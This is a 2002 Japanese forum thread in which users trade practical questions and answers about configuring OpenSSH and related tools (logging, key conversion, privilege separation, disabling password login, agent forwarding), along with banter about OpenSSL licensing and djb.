とあるファイル「TEST.TXT」に対して、グループを設定しました。
そのグループに仮にですがAとBというユーザーが含まれています。
TEST.TXTのOWNERは、ユーザーAになっています。
ファイルのパーミッションは、664です。

そこでユーザーBが、サーバー側にあるTEST.TXTと同名のファイルを
ローカルからサーバーへアップロードをさせようとすると
「OPERATION NOT DENIED」と表示されてしまい、上書きの
アップロードをすることができません。
WinSCPでは、OWNERが違うとグループが同じでパーミッションでも許可して
いてもファイルのOWNERと違うユーザーは上書きアップロードをすることが
できないのでしょうか。

よければ教えてください。
どうも失礼しました
257 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/26 17:45: >>256
そのファイルがあるディレクトリの
owner と permission はどうよ。
258 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/26 18:19: がいしゅつかもしれませんが

ssh2 のログイン情報等は /var/log/messages に出力されていると思いますが
ssh2関連の情報だけを、別のログファイルへ (ex: /var/log/ssh2_log etc...)　出力する事は可能なのでしょうか？
259 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/26 18:26: >>>258 /etc/syslog.conf
260 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/26 18:34: >>259

はい、/etc/syslog.conf に

# ssh2d login
*.sshd2 /var/log/sshd.log

に、記述し、syslogdにHUPをかけたのですが、うまく sshd.logには、出力されないのです。

記述の仕方が間違っているのでしょうか？
261 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/26 18:41: >>260 はい。
262 名前：名無しさん＠お腹いっぱい メール：sage 投稿日：02/09/26 18:41: >>257
ファイルが入っているディレクトリのグループは、ファイルと一緒ですが、
OWNERはAでもBでもないまた別のアカウントです。
これではいけないでしょうか。
263 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/26 18:42: >>260
OS は何?
264 名前：260 投稿日：02/09/26 19:39: >>261
正しい記述の方法をご教授頂けますと深甚です。

>>263
RedHat Linux 6.2 です。
265 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/26 19:45: >>264
OpenSSHに変えて、sshd -e 2> LOGFILE で解決しる
266 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/26 20:06: >>264
なぜ man を調べようとしない？
267 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/26 23:13: >256
logging を on にして、詳細をみてみるとか
268 名前：名無しさん＠お腹いっぱい。 投稿日：02/09/27 10:37: >>155 のやり方で OpenSSH で生成した SSH2プロトコル用の鍵（公開鍵および秘密鍵、念のためDSA および RSA どっちも）を SSH Communications Security Corp の SSH Secure Shell で使うべく変換しました。
で SSH Secure Shell からインポートしたら確かにインポートされました。
鍵一覧表示には「1024-bit DSA, converted from OpenSSH by ore@orenohost」と表示されています。
が、これを使って認証ができません。また、秘密鍵のパスフレーズの変更もできないようです。
もちろん SSH Secure Shell 自身で作った鍵なら認証もパスフレーズの変更もできます。
やはり OpenSSH と SSH Secure Shell の間での鍵の共有はできないのでしょうか？

OpenSSH は Cygwin 上のものと Debian GNU/Linux のものを試してみました。
269 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/27 10:39: ところで SSH の呼称ですが、
プロトコル自体を表す場合は SecSH
SSH Communications Security 社のクライアントを表す場合は SSH Secure Shell
オープンソースのクライアントを表す場合は OpenSSH
ということでいいんでしょうか？
270 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/27 10:48: >>269
> オープンソースのクライアントを表す場合は OpenSSH
OpenSSH はサーバも含むし、
OpenSSH 以外にも open source の SSH ソフトウェアはある。
271 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/27 10:52: >>270
そ、そですね。じぶんも OpenSSH の sshd 使ってながら…
PuTTY などもソースコード公開されてますしね。
272 名前：268 投稿日：02/09/27 12:30: なんか勘違いしていたようです。
秘密鍵は変換できないんですね。

ssh-keygen -e -f id_dsa

の出力を良く見ると

---- BEGIN SSH2 PUBLIC KEY ----

で始まってる・・・異なるクライアントなんだから、秘密鍵は作り直せってことですね。
273 名前：名無しさん＠お腹いっぱい。 投稿日：02/09/27 12:58: さらばOpenSSLなのか。。。

OpenBSDって、やること極端ね
274 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/27 13:12: TheoSSL の発表はいつですか(w
275 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/27 13:14: >>273
どういうこと?
276 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/27 13:54: OpenSSH 3.5 がそろそろ出るよn.
277 名前：名無しさん＠お腹いっぱい。 メール：age 投稿日：02/09/27 15:15: >>275
http://marc.theaimsgroup.com/?l=openbsd-misc&m=103280816316720&w=2
278 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/27 15:46: >>277
フリーを保つという姿勢は立派だが、最後の二行で喧嘩売りすぎ。Theo 節が
冴え渡っとるな。
279 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/27 15:49: いやぁ、まぁ潔癖をつらぬくためにはソレくらいの喧嘩腰でないとだめかも試練。
俺的には、消して極端とは思えない。

潔癖症といえば、 Debian も潔癖症だね。
280 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/27 15:49: >>279 ごめん、誤字多すぎた。
281 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/27 15:53: >>277
> the licence on the new code basically builds a contract that says "if
> you use this code, you cannot sue Sun".
このライセンスの原文ってどこにあるの？

訴訟を起こせないといっても要するにBSD ライセンスや MIT ライセンスの
責任放棄の表明と変わらんような気もするんだが。(THIS SOFTWARE IS
PROVIDED "AS IS" ... 以下ね)
282 名前：名無しさん＠お腹いっぱい。 投稿日：02/09/27 16:03: Debian の ML でも出た話題。
http://lists.debian.org/debian-legal/2002/debian-legal-200209/msg00183.html
結論、non-free になる。

Debian は徹底した「フリー」主義だからなぁ。
Scial Contract （憲章？） http://www.debian.org/social_contract
What Does Free Mean? http://www.debian.org/intro/free

ライセンスの問題とは関係ないけど、 CNET の記事。
http://msnbc-cnet.com.com/2100-1001-958679.html?type=pt&part=msnbc&tag=alert&form=feed&subj=cnetnews
283 名前：281 メール：sage 投稿日：02/09/27 16:04: これか。
http://marc.theaimsgroup.com/?l=cryptography&m=103253111420211&w=2
284 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/27 16:12: >>282
non-free だからといってメンテされないわけではない。
モノによるが。

参考: BOF 報告
http://pc.2ch.net/test/read.cgi/linux/1030178687/764
http://pc.2ch.net/test/read.cgi/linux/1030178687/808
285 名前：281 メール：sage 投稿日：02/09/27 16:15: >>283
確かに ECC のコードに関しては、従来の OpenSSL のライセンスよりもかなり
キツいね。

ただ、そのライセンスは ECC 使う場合にのみ関係してくる話で OpenSSL の内、
OpenSSH が利用している部分には無関係だから、神経質になる必要はないと
思うけどな。GPL と違って「混ぜるな危険」という性質のライセンスでもないし。

もちろん Debian が OpenSSL を non-free と分類するのは正しいし、それは
一貫性のある見識。でも BSD ライセンスを採用している OpenBSD でそこに
拘るのは違うような気がする。
286 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/27 20:00: >>269
>ところで SSH の呼称ですが、
>プロトコル自体を表す場合は SecSH

「ｾｸｰｼｭ」？
287 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/27 22:35: >>286
そのつづりで長音が入るとは、どこの訛りだ？
288 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/27 22:43: 2ちゃんねる
289 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/27 23:05: ●っ●●→●●ー●のパターンですな
ﾏﾀ-ﾘ
ｾｸ-ｽ
などなど
290 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/28 00:03: ●●ー●ﾆﾔﾘ
291 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/28 00:30: http://cr.yp.to/djbssh.html
もうすぐ

出してくれないかなぁ・・・
292 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/28 01:24: djbがSSHなどという複雑怪奇なプロトコルを実装するとはとても思えない。
やるとしたらまったく別の、もっと単純なプロトコルで、
暗号化と認証とインタフェイスをべつべつのプログラムに分けるだろう。
そしてたぶん最初は windows クライアントがなくて、使えねー、ということに
なると思う。まあやんないと思うけど。

>>291は「djbなら安全」とかいう知識をどっかから聞きかじってきただけで、
どうせdjb関連のツールなんてろくに使ったことないでしょ。
djbも名前が一人あるきしてるな。
293 名前：名無しさん＠Ｍｅａｄｏｗ 投稿日：02/09/28 02:25: 学者としてのdjbの専門はいちおー暗号なわけだから、
sshに使うかどうかは別として、ライブラリぐらいなら作っても不思議はないと思われ。

つーか、ネタにマジレス以下略。オレモナー。
294 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/28 02:46: >292
>SSHなどという複雑怪奇なプロトコル
SSH自体は全く複雑でも奇怪でもないと思うが。
複雑なのは、それを実装しているプログラムかと。
それこそdjbの思想の出番でそ。djb自身は動きそうに無いけど。

てか、ネタにm（略
295 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/28 03:41: >SSH自体は全く複雑でも奇怪でもないと思うが。

互換性がないバージョンが2つあるのは十分複雑だと思うが。
SSH2だけでも、djbが嫌ってるRFC822よりは十分複雑。

>学者としてのdjbの専門はいちおー暗号なわけだから、

例の訴訟に勝つまでは暗号関係のプログラムは公開しないんじゃないかなあ。
296 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/28 06:15: >>295 しかし RFC822 はもはや変更しようがないし。
297 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/28 11:05: >>291
みんなが騒ぐから……
ttp://djbsshd.qmail.jp/why-not.html
298 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/28 14:31: しつこいがきんちょだなあ
面白くないっつの
299 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/28 15:55: djb 厨は妄想癖が強い割に想像力が貧困な香具師ばかりだな。氏ねや。
300 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/28 23:37: FreeBSDにOpenSSHを入れようとしてみました。
すると、./configureとmakeまでは何にも問題ないようでしたが、
make installしたら、
id: sshd: no suth user
WARNING: Privilege separation user "sshd" does not exist
って出て止まりますた。
sshdユーザが必要だったんですか？まったく気づきませんでした。
このユーザは名前がsshdなら何でも良いのでふか？
特権分離ユーザ・・・？ってなに？素人丸出しでスマソ。
301 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/28 23:39: >>300
標準で入っている OpenSSH じゃ満足出来なく ports を使う事も拒むとは
よほどのパワーユーザ様なんですね。
尊敬しちゃいます。
302 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/28 23:41: >>295
> SSH2だけでも、djbが嫌ってるRFC822よりは十分複雑。

# そもそも「プロトコル」であるSSH2と、mailの「フォーマット」を
# 定義しているRFC822とを比較するのはナンセンスだと思うが…

RFC822はその曖昧さが実装を面倒にさせている原因だろ。
おまけに、MIMEのような拡張があったり、RFCに厳密に準拠していない
agentの面倒もみなくちゃならなかったりするからな。

一方、SSH2(secsh)は記述量こそ大きいが、状態遷移は
非常に単純なプロトコルだし、Packetのフォーマットも
単純で厳密。
http://www.ietf.org/html.charters/secsh-charter.html

勉強がてらdsniffのsshmitmをSSH2に対応させたものを
作ってみたことがあるが、暗号化/復号部分をOpenSSLに
まかせれば、Transport LayerやAuthenticationの部分は
あっという間に作れてしまうぞ。

# 少なくともSSH2よりIMAP4の方が複雑だと思うな。
303 名前：名無しさん＠お腹いっぱい。 投稿日：02/09/29 01:44: >>296
え゛？RFC2822は？
304 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/29 02:03: てゆーかRFCは定義じゃないんだが。
曖昧なのも当たり前。厨房かお前ら。
305 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/29 02:06: >302
djbはOpenSSLも信用しないだろうな（藁
306 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/29 08:17: >>305 あ、オレもopensslは信用してないよ。
307 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/29 09:29: opensshは信用してるわけ??
308 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/29 11:12: >>297
これ、原文はどこなんですか。最近の前里予さんはだいぶカドが取れた
感じがするけど、やっぱちょっとアレルギーがあるので。
309 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/29 12:03: (･∀･)ｼﾞｻｸｼﾞｴﾝﾃﾞｼﾀ
310 名前：sage 投稿日：02/09/29 12:42: djbがssh実装して、theoと煽り合戦するとこみたい。金払うし。
311 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/29 15:26: 面白くなって参りました！
312 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/30 23:27: >>311
おーい、皆んな緊張しちゃって面白くないこと書けなくなっちゃったぞ。
313 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/02 19:38: あの・・・・ sftp って初めて知った。
名前だけは知ってたけど、sslwrapper + ftp と思ってた。
逝ってヨシ？
314 名前：302 メール：sage 投稿日：02/10/02 23:48: >>305-306
OpenSSLを使うって言っても、暗号ライブラリの部分だけ。
(ソースでいうとcryptoディレクトリの下)
直接入出力に関わる部分じゃないし、そもそも暗号ライブラリって
アルゴリズムの塊だから、自分で実装しなおすメリットはあまりないかも。

# まあ、OpenSSLのSSL/TLS実装部分はごちゃごちゃしすぎて
# 信用できないってのには激しく同意。
# つーか、実際大穴があいていたし。
# http://www.cert.org/advisories/CA-2002-23.html
315 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/03 00:03: >314
djbは libc すら信用しない人ですから
316 名前：302 メール：sage 投稿日：02/10/03 00:20: >>315
> djbは libc すら信用しない人ですから
そうだった…スマソ
317 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/03 02:15: いいかげん djb 厨の妄想ネタは余所でやってくれよ。
318 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/03 08:14: >>317 ここらがいいかも。
http://pc.2ch.net/test/read.cgi/unix/1029619161/l50
319 名前： ◆XSSH/ryx32 メール：sage 投稿日：02/10/03 20:52: スレ汚し記念カキコ
320 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/06 02:19: >>315
> djbは libc すら信用しない人ですから
でもシステムコール (というかカーネル) は信用してるのね。
321 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/06 04:13: > でもシステムコール (というかカーネル) は信用してるのね。

信用できる部分をなるべくせばめる、ということでは。
322 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/06 04:54: UNI×系OSにおいてカーネルとの唯一のインターフェースであるシステムコールを否定したら何も残らないじゃん

つーかスレ違（略
323 名前：名無しさん＠お腹いっぱい。 メール：age 投稿日：02/10/06 13:45: djbBSD, djbLinux希望!!
324 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/06 14:02: >>323
余所でやれと言ってるだろ。氏ね。
325 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/06 14:43: これだからdjb厨房は…
326 名前：名無しさん＠Ｅｍａｃｓ メール：sage 投稿日：02/10/08 17:46: ssh の ml 厨房が多いな
327 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/09 01:37: 日本語の ssh の ML なんてあるんだ。
328 名前：名無しさん＠お腹いっぱい。 投稿日：02/10/11 16:09: 今日、OpenSSHとTTSSHを導入して、SSHバージン卒業たばっかなんで
優しくお願いしますね。

で、telnet止めてログインしてみたんだけど、鍵がなくてもアカウントとパス
ワードで入れるじゃないですか？

てっきり鍵セットがないと、ログインできなくなるんで安心なのかと思って
たんですが、違うんですかね？

カギのないホストからは、アカウントとパスワードが合っていても入れなく
はできないんでしょうか？
329 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/11 16:12: >>328
> カギのないホストからは、アカウントとパスワードが合っていても入れなく
> はできないんでしょうか？
できます。
330 名前：328 投稿日：02/10/11 16:18: >>329

それは、OpenSSH+TTSHでも可能なんですか？
良かったら、方法を教えてください。
331 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/11 16:24: >>330
man sshd_config
332 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/11 16:26: >>330
PasswordAuthentication no
333 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/11 16:28: >>332
甘やかすなよ。
334 名前：328 投稿日：02/10/11 16:39: >>331
>>332

sshd_config を設定して再起動したらできました。
ありがとうございました。
335 名前：328 投稿日：02/10/11 16:41: >>333

すいませんね。
今度,OpenSSHセキュリティ管理ガイド　買おうと思ってます。

＃導入書には、sshd_config は触る必要ないって書いてありました
336 名前：名無しさん＠Ｅｍａｃｓ メール：sage 投稿日：02/10/11 17:14: >>335
> ＃導入書には、sshd_config は触る必要ないって書いてありました

(ﾟДﾟ)ﾊｧ?
337 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/11 23:41: >>328
ChallengeResponseAuthentication no
も設定しておくべし。
http://home.jp.FreeBSD.org/cgi-bin/showmail/FreeBSD-users-jp/71239
338 名前：教えて君 メール：sage 投稿日：02/10/11 23:43: すみません。自分なりに調べてみたけれどわからなかったので、質問させてください。

OpenSSHからSSHにSSHエージェントをフォワードして使うことはできないのでしょうか？
もし何か方法があるなら教えて欲しいのですが。
339 名前：名無しさん＠お腹いっぱい。 メール：age 投稿日：02/10/12 00:23: 普通にsshエージェントを動かすように設定すれば使えるよ
340 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/12 00:47: リモートマシンで
echo $SSH_AUTH_SOCK
とやって何やら表示されてればagent forwardingがきいている。
341 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/12 00:58: ADSL + DynamicDNS なホストに、slogin する度に、known_hosts が、
どんどん太っていくんで、困っているんだがなにかいい方法ない?
342 名前：338 メール：sage 投稿日：02/10/12 01:04: 回答ありがとうございます>>339 >>340
リモートマシンで
echo $SSH_AUTH_SOCK
とすると、
Undefined variable
と表示されてしまいました。何かおかしいところがないか勉強しなおしながらやってみます。
343 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/12 01:40: >341
DDNS
344 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/12 01:58: >>338
>>339
>>340
http://www.first.tsukuba.ac.jp/~kiyotomo/aboutopenssh.html
詳しくないけど、こんなのがあるから
agent forwardingが効かない場合もあるんじゃないの？
345 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/12 02:10: >>341
おれのとこでは太っていかないなぁ。あれってIPアドレスで見てるのかな。ホスト名でみてるんじゃない？ちなみにおれは $HOME/.ssh/config に StrictHostKeyChecking yes って書いてる。
346 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/12 08:46: >>345
お、それでいけますた。サンクスコ。
347 名前：名無しさん＠お腹いっぱい。 投稿日：02/10/12 11:14: SSHとは直接関係ないんですが、他に適当なスレが見当たらな
いので、質問させてもらいます。
自宅のTeratermでunix(Solaris)サーバにアクセスしてます。
１つのサーバは、emacs -nwもコンソールでも正常に日本語が
表示されますが、もう一つのサーバではコンソールは問題ない
のですが、emacs -nwでは、日本語表示が'????'になってしま
います。正常な方は.cshrcにLANG=jaとなっていて、異常な
方はLANG=japaneseとなっています。でもコンソールは問題
ないのでこれが原因とは思われません。.emacsは同じ記述で
す。何かお心当たりはありませんでしょうか。
348 名前：名無しさん＠お腹いっぱい。 投稿日：02/10/12 12:30: 表示がうまくいかないほうのサーバもLANG=jaにしたらどうなりますか？
349 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/12 13:26: >>349
レスありがとん。
.cshrcで'set LANG ja'にしてもだめでした。
実は正常に日本語表示できる方は、emacsではなくmuleでした。
日本語表示できないほうは、emacs20.6です。
.Xdefaultsは、-nwで起動するときは効いてこないのですよね。
.Xdefaultsには違いがあるんですが関係ないですよね。
350 名前：名無しさん＠Ｍｅａｄｏｗ メール：sage 投稿日：02/10/12 13:34: set してどーする。setenv だろ。
つーか、ssh 関係ない。くだ質あたりに逝ってらっしゃい。
351 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/12 15:20: >347
~/.emacs の見直し
てか禿スレ違い
352 名前：名無しさん＠お腹いっぱい。 投稿日：02/10/12 16:52: Soralis7 (Sparc)に OpenSSH 3.4p1をインストールしたんですが
sshd起動時に"特権分離と圧縮は使えない"みたいなメッセージが
でます。特権分離が有効になる条件は何でしょうか？
インストールは ./configure; make; make install
でやってます。
353 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/12 16:59: >>352
がいしゅつ過ぎ。
README.privsep 読め。
354 名前：名無しさん＠お腹いっぱい。 投稿日：02/10/15 21:11: OpenSSH 3.5
http://www.openssh.com/
355 名前：名無しさん＠お腹いっぱい。 投稿日：02/10/15 22:41: ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!!!!
356 名前：名無しさん＠お腹いっぱい。 投稿日：02/10/15 22:59: portableはまだか?
357 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/15 23:12: >>352
圧縮をやめよう
358 名前：名無しさん＠お腹いっぱい。 投稿日：02/10/15 23:51: >>354
まだどこにもファイルねーじゃん
359 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/16 00:55: ﾎﾝﾄﾀﾞ
360 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/16 01:01: そして失われた信用は永遠に取り戻すことは出来なかったとさ。
めでたしめでたし。
361 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/16 01:04: cd src; cvs up usr.bin/ssh
362 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/16 11:12: 3.5p1、ftp.openbsd.orgでダウソしますた
363 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/16 12:06: 今回も毒入ってた?
364 名前：毒無し メール：sage 投稿日：02/10/16 12:46: - MD5 (openssh-3.5p1.tar.gz) = 42bd78508d208b55843c84dd54dea848
- MD5 (openssh-3.5.tgz) = 79fc225dbe0fe71ebb6910f449101d23
365 名前：名無しさん＠Ｍｅａｄｏｗ メール：sage 投稿日：02/10/16 18:34: >>347 - >>351でお世話になったものですが、
TeraTerm上で、emacs -nwで日本語が化けていた原因が
分かりましたので一応報告させていただきます。
(set-terminal-coding-system 'euc-jp)
を入れたらＯＫとなりました。このサーバはこの前まで
私の机にあったので、直接サーバー機にログインしてやって
ましたので、これがなくても大丈夫だったのですた。
スレ汚しスマソ。
366 名前：名無しさん＠お腹いっぱい。 メール：age 投稿日：02/10/16 19:43: >>365
最初にチェックすべきとこだな、おまけにスレ違い、あほんだらが。
367 名前：365 メール：sage 投稿日：02/10/18 09:55: >>366
　（;´Д｀）　　ｽﾐﾏｾﾝｽﾐﾏｾﾝ
　（　八)
　　　〉〉
許してくらさい
368 名前：さんざんｶﾞｲｼｭﾂだが… メール：sage 投稿日：02/10/18 13:43: >>367
SSHについては
　　http://www.unixuser.org/~haruyama/security/openssh/support/
の本読んどけ。ぜってー損はしないからな。
369 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/18 21:55: >>368
> ぜってー損はしないからな
主語は「貴方が」ですか？
370 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/19 04:49: 煽りでないとして…

>>369
「少なくとも」私は読んでよかったと思ってます。
371 名前：名無しさん＠お腹いっぱい。 投稿日：02/10/19 09:30: 大学から家にsshでつなぎたいんです。
http://www.gcd.org/sengoku/docs/NikkeiLinux01-01/telnet.ja.html#COMMAND
ここ見てやってます。

ProxyCommandを指定すると、

・Linux(Vine)からは、とりあえずプロキシコマンドを読むところまでは行く(繋がらないけど)。

・Windows(2000)からTeraTermや本家SSH(?)で試すと、
/bin/sh: ~/.ssh/proxy-telnet: not found
ssh_exchange_identification: Connection closed by remote host
とでて終了します。(これは本家SSHの結果。TeraTermでも同じ意味の結果がでました)
何が原因でしょうか？

Unix初心者で大学の計算機の構成が良くわからないんですが、
とりあえず個々のPCにWindows2000とVineLinuxが入ってて、
WindowsからはTeraTermで学内のTelnetサーバかSSHサーバにログインして操作します。
本家SSHで試したのは、家からダイヤルアップPPPで学校に接続して学内SSHサーバにログインし、
そこから家に接続しかえそうとしたときです。
372 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/19 09:34: >>371
> 大学の計算機の構成が良くわからないんですが
おまえがわからないものが俺らにわかるはずが無い管理者に聞け。
373 名前：371 メール：sage 投稿日：02/10/19 09:39: >>372
似たような環境もたくさんありそうで、一般的な症状だったら
解決策がわかる人もいるかもしれないと思ったんですが。
374 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/19 10:50: >>373
んじゃ、似たような環境の人がくるまで根気良く待っててください。
375 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/10/19 16:29: /bin/sh: ~/.ssh/proxy-telnet: not found
これが全てだと思うのですが、ファイルあんの？
376 名前：371 投稿日：02/10/19 19:41: >>375
レスありがとうございます。

例えば、>>371のエラーが出た直後に
mule ~/.ssh/proxy-telnet
とすればちゃんとファイルが開きます。
3